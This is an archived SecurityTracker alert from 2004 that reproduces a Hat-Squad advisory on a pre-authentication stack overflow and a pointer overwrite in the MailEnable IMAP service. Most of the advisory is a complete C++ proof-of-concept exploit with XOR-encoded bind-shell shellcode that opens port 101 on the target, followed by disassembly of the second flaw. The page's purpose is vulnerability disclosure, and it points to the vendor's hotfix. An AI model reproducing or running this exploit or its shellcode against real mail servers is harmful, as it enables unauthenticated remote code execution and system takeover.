SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   MailEnable Vendors:   MailEnable Pty. Ltd.
MailEnable Stack Overflow and Pointer Overwrite in IMAP Service Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012327
SecurityTracker URL:  http://securitytracker.com/id/1012327
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 25 2004
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Professional Edition v1.52, MailEnable Enterprise Edition v1.01
Description:   Hat-Squad Security Team reported two vulnerabilities in MailEnable in the IMAP service. A remote user can execute arbitrary code.

It is reported that a remote user can trigger a stack-based buffer overflow or an object pointer overwrite to execute arbitrary code on the target system.

A remote user can send a specially crafted command in the following format to trigger the buffer overflow:

<identifier tag 3bytes> <Ax8198> <ret_addr>

The original advisory and some demonstration exploit code is available at:

http://www.hat-squad.com/en/000102.html

Nima Majidi is credited with discovering this flaw.

The vendor was notified on November 24, 2004.

Impact:   A remote user can execute arbitrary code on the target system with the privileges of the IMAP service.
Solution:   The vendor has issued a fix, available at:

http://mailenable.com/hotfix.asp

Vendor URL:  www.mailenable.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Hat-Squad Advisory: Remote buffer overflow in MailEnable IMAP service


Hi,

Please see the attached security advisory for MailEnable vulnerabilities with
POC included.

Thanks,

Hat-Squad Security Team





   				 Hat-Squad Security Team Advisory 
                                      http://www.hat-squad.com 

Product: MailEnable Mail Server
Vendor Url: http://www.mailenable.com
Version: MailEnable Professional Edition v1.52, MailEnable Enterprise Edition v1.01
Vulnerability: Remote buffer overflow in IMAP service 
Release Date: 26 November, 2004

Vendor Status: 
InInformed on 24 November 2004
Response: 24 November 2004
Fixed on 25 November 2004


Overview: 

MailEnable's Mail Server software provides a enterprise messaging platform for Microsoft Windows NT/2000/XP/2003 systems. 
MailEnable Proferssional IMAP services allows users to have server hosted folders and subfolders.
 Two vulnerabilities were discovered by Hat-Squad Team in MailEnable's IMAP service including a stack based buffer overflow
 and an object pointer overwrite, both can lead to remote execution of arbitrary code.
  
Problem: 

1. Stack based Buffer Overflow:

Due to a boundary check bug in the IMAP service, sending a client command with more than 
8198 bytes will cause a stack buffer overflow.This vulnerability can be triggered before any kind of authentification.

Sample Request:  

<identifier tag 3bytes> <Ax8198> <ret_addr>  

as a result EIP will be overwritten with ret_addr.

Proof Of Concept Exploit by class101 (class101@hat-squad.com) :

-----------------------------------------------------------------------------------------
/*

Mailenable Pro v1.52, IMAP Service, Remote Buffer Overflow Exploit by 
class101(class101@hat-squad.com)

Tested on: 
	Win2k SP4 Pro    English  
	Win2k SP4 Pro    French   
	Win2k SP4 Server English 

Greetz: Arashy, Homi 	   
*/

#include "winsock2.h"
#include "fstream.h"

#pragma comment(lib, "ws2_32")

//BIND shellcode port 101, XORed 0x88, thanx HDMoore. 

char scode[] ="\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";



static char payload[10000];

char magikcll[]="\x7a\x8c\x01\x10"; //CALL EDI - MEAISP.dll - "Universal"

void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
	ver();
	if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}	
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){
		cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
	int ip=htonl(inet_addr(argv[1])), sz, port, sizeA, a;
	
	if (argc==3){port=atoi(argv[2]);}
	else port=143;
	char *target;
	target=magikcll;
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);if (s==INVALID_SOCKET){
	cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();
	return -1;}
		
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	WSAConnect(s,(struct sockaddr 
*)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {
			cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);
			return -1;
		}
		case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);
			return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			cout<<"[+] connected, constructing the payload..."<<endl;
			Sleep(2000);
			sizeA=8202-sizeof(scode);
			sz=3+8198+4;
			memset(payload,0,sizeof(payload));
			strcat(payload,"\x41\x41\x41");
			strcat(payload,scode);
			for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
			strcat(payload,target);
			strcat(payload,"\r\n");
		    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { 
				cout<<"[+] sending error, the server prolly rebooted."<<endl;
				return -1;}
			Sleep(1000);
			cout<<"[+] size of payload: "<<sz<<endl;			
			cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
			return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}


void usage(char* us) 
{  
	cout<<"USAGE: me_expl.exe <Target> <Port>\n"<<endl;
	cout<<"NOTE:                               "<<endl;
	cout<<"      The port 143 is default if no port are specified"<<endl;
	cout<<"      The exploit bind a shellcode to the port 101"<<endl;
	return;
} 
void ver()
{	
cout<<""<<endl;
cout<<""<<endl;
cout<<"       ============================================================"<<endl;
cout<<"        ======MailEnable, Pro Mail Server for Windows <= v1.52======="<<endl; 
cout<<"        ========IMAP Service, Remote Buffer Overflow Exploit========="<<endl;
cout<<"        ======coded by class101=============[Hat-Squad.com 2004]====="<<endl;
cout<<"       ============================================================"<<endl;
cout<<""<<endl;
}

-----------------------------------------------------------------------------------------

2. Object Pointer Overwrite:

MailEnable failes to check length of the request snet to IMAP service, 
before doing any command processing task. Sending more than 432 bytes 
to MEIMAP and terminating the connection, will cause a pointer overwrite 
and in execution flow, EAX,ECX and EDX registers will be overwritten . 
Part of the vulnerable code goes below:

0040E9E0  /$ 55             PUSH EBP
0040E9E1  |. 8BEC           MOV EBP,ESP
0040E9E3  |. 51             PUSH ECX
0040E9E4  |. 894D FC        MOV DWORD PTR SS:[EBP-4],ECX
0040E9E7  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0040E9EA  |. 8338 00        CMP DWORD PTR DS:[EAX],0
0040E9ED  |. 74 10          JE SHORT MEIMAPS.0040E9FF
0040E9EF  |. 8B4D FC        MOV ECX,DWORD PTR SS:[EBP-4]
0040E9F2  |. 8B11           MOV EDX,DWORD PTR DS:[ECX]	<-------- Exception
0040E9F4  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0040E9F7  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]
0040E9F9  |. 8B01           MOV EAX,DWORD PTR DS:[ECX]
0040E9FB  |. 52             PUSH EDX
0040E9FC  |. FF50 04        CALL DWORD PTR DS:[EAX+4]		<------- Method Call
0040E9FF  |> 8BE5           MOV ESP,EBP
0040EA01  |. 5D             POP EBP
0040EA02  \. C3             RETN

The actual code should be :
.......
char *buff;
...
strcpy(buff,input);		<--- obj pointer overwrite
...
vuln_function(SomeClass *obj, char *input) {

obj->someMethod();
...
}

"call dword ptr ds:[EAX+4]" stands for  "obj_arg->someMethod();" . This call instruction could be used to
 exploit by brute-forcing input buffer address in stack area.

Vendor Response: 

MailEnable has released a patch for these vulnerabilities: http://mailenable.com/hotfix.asp


Credits: 
Discovery: Nima Majidi (nima_majidi@hat-squad.com)
Additional Research: idespinner(idespinner@hat-squad.com) and class101 (class101@hat-squad.com)

Original advisory could be found at:
http://www.hat-squad.com/en/000102.html
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC